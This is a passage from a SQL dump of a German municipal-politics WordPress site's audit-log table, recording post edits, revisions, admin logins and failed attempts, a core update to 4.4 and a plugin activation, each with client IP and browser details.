CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2676,440,'CurrentUserID','2'),(2677,440,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2678,441,'PostID','413'),(2679,441,'PostType','post'),(2680,441,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2681,441,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2682,441,'RevisionLink',''),(2683,441,'ClientIP','176.0.31.33'),(2684,441,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2685,441,'CurrentUserID','2'),(2686,441,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2687,442,'PostID','413'),(2688,442,'PostType','post'),(2689,442,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2690,442,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2691,442,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2692,442,'ClientIP','176.0.31.33'),(2693,442,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2694,442,'CurrentUserID','2'),(2695,442,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2696,443,'Attempts','2'),(2697,443,'Username','Olli'),(2698,443,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2699,443,'ClientIP','5.147.41.205'),(2700,443,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2701,444,'Username','Olli'),(2702,444,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2703,444,'ClientIP','5.147.41.205'),(2704,444,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2705,445,'PostID','413'),(2706,445,'PostType','post'),(2707,445,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2708,445,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2709,445,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2710,445,'ClientIP','5.147.41.205'),(2711,445,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2712,445,'CurrentUserID','2'),(2713,445,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2714,446,'PostID','413'),(2715,446,'PostType','post'),(2716,446,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2717,446,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2718,446,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2719,446,'ClientIP','5.147.41.205'),(2720,446,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2721,446,'CurrentUserID','2'),(2722,446,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2723,447,'PostID','413'),(2724,447,'PostType','post'),(2725,447,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2726,447,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2727,447,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2728,447,'ClientIP','5.147.41.205'),(2729,447,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2730,447,'CurrentUserID','2'),(2731,447,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2732,448,'PostID','413'),(2733,448,'PostType','post'),(2734,448,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2735,448,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2736,448,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2737,448,'ClientIP','5.147.41.205'),(2738,448,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2739,448,'CurrentUserID','2'),(2740,448,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2741,449,'PostID','413'),(2742,449,'PostType','post'),(2743,449,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2744,449,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2745,449,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2746,449,'ClientIP','5.147.41.205'),(2747,449,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2748,449,'CurrentUserID','2'),(2749,449,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2750,450,'CategoryName','Sanierung Mählersbeck'),(2751,450,'ClientIP','5.147.41.205'),(2752,450,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2753,450,'CurrentUserID','2'),(2754,450,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2755,451,'PostID','413'),(2756,451,'PostType','post'),(2757,451,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2758,451,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2759,451,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2760,451,'ClientIP','5.147.41.205'),(2761,451,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2762,451,'CurrentUserID','2'),(2763,451,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2764,452,'PostID','413'),(2765,452,'PostType','post'),(2766,452,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2767,452,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2768,452,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2769,452,'ClientIP','5.147.41.205'),(2770,452,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2771,452,'CurrentUserID','2'),(2772,452,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2773,453,'PostID','413'),(2774,453,'PostType','post'),(2775,453,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2776,453,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2777,453,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2778,453,'ClientIP','5.147.41.205'),(2779,453,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2780,453,'CurrentUserID','2'),(2781,453,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2782,454,'PostID','413'),(2783,454,'PostType','post'),(2784,454,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2785,454,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2786,454,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2787,454,'ClientIP','5.147.41.205'),(2788,454,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2789,454,'CurrentUserID','2'),(2790,454,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2791,455,'PostID','413'),(2792,455,'PostType','post'),(2793,455,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2794,455,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2795,455,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2796,455,'ClientIP','5.147.41.205'),(2797,455,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2798,455,'CurrentUserID','2'),(2799,455,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2800,456,'PostID','413'),(2801,456,'PostType','post'),(2802,456,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2803,456,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2804,456,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2805,456,'ClientIP','5.147.41.205'),(2806,456,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2807,456,'CurrentUserID','2'),(2808,456,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2809,457,'PostID','413'),(2810,457,'PostType','post'),(2811,457,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2812,457,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2813,457,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2814,457,'ClientIP','5.147.41.205'),(2815,457,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2816,457,'CurrentUserID','2'),(2817,457,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2818,458,'PostID','413'),(2819,458,'PostType','post'),(2820,458,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2821,458,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2822,458,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2823,458,'ClientIP','5.147.41.205'),(2824,458,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2825,458,'CurrentUserID','2'),(2826,458,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2827,459,'PostID','413'),(2828,459,'PostType','post'),(2829,459,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2830,459,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2831,459,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=414'),(2832,459,'ClientIP','5.147.41.205'),(2833,459,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2834,459,'CurrentUserID','2'),(2835,459,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2836,460,'PostID','413'),(2837,460,'PostType','post'),(2838,460,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2839,460,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2840,460,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=415'),(2841,460,'ClientIP','5.147.41.205'),(2842,460,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2843,460,'CurrentUserID','2'),(2844,460,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2845,461,'PostID','413'),(2846,461,'PostType','post'),(2847,461,'PostTitle','Workshop zur Sanierung der Mählersbeck'),(2848,461,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2849,461,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=415'),(2850,461,'ClientIP','5.147.41.205'),(2851,461,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2852,461,'CurrentUserID','2'),(2853,461,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2854,462,'PostID','413'),(2855,462,'PostType','post'),(2856,462,'PostTitle','Workshop zur Sanierung der Mählersbeck'),(2857,462,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/workshop-zur-sanierung-der-mahlersbeck/'),(2858,462,'ClientIP','5.147.41.205'),(2859,462,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2860,462,'CurrentUserID','2'),(2861,462,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2862,463,'PostID','413'),(2863,463,'PostType','post'),(2864,463,'PostTitle','Workshop zur Sanierung der Mählersbeck'),(2865,463,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/workshop-zur-sanierung-der-mahlersbeck/'),(2866,463,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=415'),(2867,463,'ClientIP','5.147.41.205'),(2868,463,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2869,463,'CurrentUserID','2'),(2870,463,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2871,464,'OldVersion','4.3.1'),(2872,464,'NewVersion','4.4'),(2873,464,'ClientIP','5.147.41.205'),(2874,464,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2875,464,'CurrentUserID','2'),(2876,464,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2877,465,'OldVersion','4.3.1'),(2878,465,'NewVersion','4.4'),(2879,465,'ClientIP','5.147.41.205'),(2880,465,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2881,465,'CurrentUserID','2'),(2882,465,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2883,466,'Username','Olli'),(2884,466,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2885,466,'ClientIP','5.147.41.205'),(2886,466,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2887,467,'OldVersion','4.3.1'),(2888,467,'NewVersion','4.4'),(2889,467,'ClientIP','5.147.41.205'),(2890,467,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2891,467,'CurrentUserID','2'),(2892,467,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2893,468,'Username','Olli'),(2894,468,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2895,468,'ClientIP','5.147.41.205'),(2896,468,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2897,469,'Username','Olli'),(2898,469,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2899,469,'ClientIP','5.147.41.205'),(2900,469,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2901,470,'Username','Olli'),(2902,470,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2903,470,'ClientIP','195.128.40.90'),(2904,470,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36'),(2905,471,'Username','Olli'),(2906,471,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2907,471,'ClientIP','93.202.107.133'),(2908,471,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2909,472,'PostID','413'),(2910,472,'PostType','post'),(2911,472,'PostTitle','Workshop zur Sanierung der Mählersbeck'),(2912,472,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/workshop-zur-sanierung-der-mahlersbeck/'),(2913,472,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=416'),(2914,472,'ClientIP','93.202.107.133'),(2915,472,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2916,472,'CurrentUserID','2'),(2917,472,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2918,473,'Attempts','1'),(2919,473,'Username','Olli'),(2920,473,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2921,473,'ClientIP','93.202.107.133'),(2922,473,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1'),(2923,474,'Username','Olli'),(2924,474,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2925,474,'ClientIP','93.202.107.133'),(2926,474,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1'),(2927,475,'Username','Olli'),(2928,475,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2929,475,'ClientIP','5.147.41.205'),(2930,475,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2931,476,'Username','Olli'),(2932,476,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2933,476,'ClientIP','5.147.41.205'),(2934,476,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36'),(2935,477,'PluginFile','/var/www/wordpress/wp-content/plugins/tablepress/tablepress.php'),(2936,477,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:10:\"TablePress\";s:9:\"PluginURI\";s:23:\"https://tablepress.org/\";s:7:\"Version\";s:3:\"1.7\";s:6:\"Author\";s:14:\"Tobias Bäthge\";s:7:\"Network\";s:5:\"False\";}'),(2937,477,'ClientIP','5.147.41.205'),(2938,477,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36'),(2939,477,'CurrentUserID','2'),(2940,477,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2941,478,'PostID','307'),(2942,478,'PostType','post'),(2943,478,'PostTitle','Stichwahl in Wuppertal'),(2944,478,'ClientIP','81.169.187.232'),(2945,478,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(2946,478,'CurrentUserID','0'),(2947,479,'PostID','328'),(2948,479,'PostType','post'),(2949,479,'PostTitle','Vereidigung und Haushalt'),(2950,479,'ClientIP','81.169.187.232'),(2951,479,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(2952,479,'CurrentUserID','0'),(2953,480,'PostID','308'),(2954,480,'PostType','post'),(2955,480,'PostTitle','Stichwahl in Wuppertal'),(2956,480,'ClientIP','81.169.187.232'),(2957,480,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(2958,480,'CurrentUserID','0'),(2959,481,'PostID','417'),(2960,481,'PostType','post'),(2961,481,'PostTitle','Auto Draft'),(2962,481,'OldDate','2015-12-14 20:36:26'),(2963,481,'NewDate','2015-12-14 20:36:54'),(2964,481,'ClientIP','5.147.41.205'),(2965,481,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2966,481,'CurrentUserID','2'),(2967,481,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2968,482,'PostID','417'),(2969,482,'PostType','post'),(2970,482,'PostTitle','Ratssitzung vom 14.12.2015'),(2971,482,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(2972,482,'ClientIP','5.147.41.205'),(2973,482,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2974,482,'CurrentUserID','2'),(2975,482,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2976,483,'PostID','417'),(2977,483,'PostType','post'),(2978,483,'PostTitle','Ratssitzung vom 14.12.2015'),(2979,483,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(2980,483,'ClientIP','5.147.41.205'),(2981,483,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2982,483,'CurrentUserID','2'),(2983,483,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2984,484,'PostID','417'),(2985,484,'PostType','post'),(2986,484,'PostTitle','Ratssitzung vom 14.12.2015'),(2987,484,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(2988,484,'ClientIP','5.147.41.205'),(2989,484,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2990,484,'CurrentUserID','2'),(2991,484,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2992,485,'PostID','417'),(2993,485,'PostType','post'),(2994,485,'PostTitle','Ratssitzung vom 14.12.2015'),(2995,485,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(2996,485,'ClientIP','5.147.41.205'),(2997,485,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2998,485,'CurrentUserID','2'),(2999,485,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3000,486,'PostID','417'),(3001,486,'PostType','post'),(3002,486,'PostTitle','Ratssitzung vom 14.12.2015'),(3003,486,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(3004,486,'ClientIP','5.147.41.205'),(3005,486,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3006,486,'CurrentUserID','2'),(3007,486,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3008,487,'PostID','417'),(3009,487,'PostType','post'),(3010,487,'PostTitle','Ratssitzung vom 14.12.2015'),(3011,487,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(3012,487,'ClientIP','5.147.41.205'),(3013,487,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3014,487,'CurrentUserID','2'),(3015,487,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3016,488,'PostID','417'),(3017,488,'PostType','post'),(3018,488,'PostTitle','Ratssitzung vom 14.12.2015'),(3019,488,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(3020,488,'ClientIP','5.147.41.205'),(3021,488,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3022,488,'CurrentUserID','2'),(3023,488,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3024,489,'PostID','417'),(3025,489,'PostType','post'),(3026,489,'PostTitle','Ratssitzung vom 14.12.2015'),(3027,489,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(3028,489,'ClientIP','5.147.41.205'),(3029,489,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3030,489,'CurrentUserID','2'),(3031,489,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3032,490,'PostID','417'),(3033,490,'PostType','post'),(3034,490,'PostTitle','Ratssitzung vom 14.12.2015'),(3035,490,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(3036,490,'ClientIP','5.147.41.205'),(3037,490,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3038,490,'CurrentUserID','2'),(3039,490,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3040,491,'PostID','417'),(3041,491,'PostType','post'),(3042,491,'PostTitle','Ratssitzung vom 14.12.2015'),(3043,491,'PostUrl','http://www.ollital.de/wordpress/?p=417'),(3044,491,'ClientIP','5.147.41.205'),(3045,491,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3046,491,'CurrentUserID','2'),(3047,491,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3048,492,'PostID','417'),(3049,492,'PostType','post'),(3050,492,'PostTitle','Ratssitzung vom 14.12.2015'),(3051,492,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/ratssitzung-vom-14-12-2015/'),(3052,492,'ClientIP','5.147.41.205'),(3053,492,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3054,492,'CurrentUserID','2'),(3055,492,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3056,493,'PostID','417'),(3057,493,'PostType','post'),(3058,493,'PostTitle','Ratssitzung vom 14.12.2015'),(3059,493,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/ratssitzung-vom-14-12-2015/'),(3060,493,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=418'),(3061,493,'ClientIP','5.147.41.205'),(3062,493,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3063,493,'CurrentUserID','2'),(3064,493,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3065,494,'PostID','412'),(3066,494,'PostType','post'),(3067,494,'PostTitle','Auto Draft'),(3068,494,'ClientIP','81.169.187.232'),(3069,494,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(3070,494,'CurrentUserID','0'),(3071,495,'Username','Olli'),(3072,495,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3073,495,'ClientIP','195.128.40.90'),(3074,495,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36'),(3075,496,'Username','Olli'),(3076,496,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3077,496,'ClientIP','5.147.41.205'),(3078,496,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3079,497,'Username','Olli'),(3080,497,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(3081,497,'ClientIP','5.147.41.205'),(3082,497,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(3083,498,'Attempts','1'),(3084,498,'ClientIP','192.0.101.228'),(3085,498,'UserAgent','Jetpack by 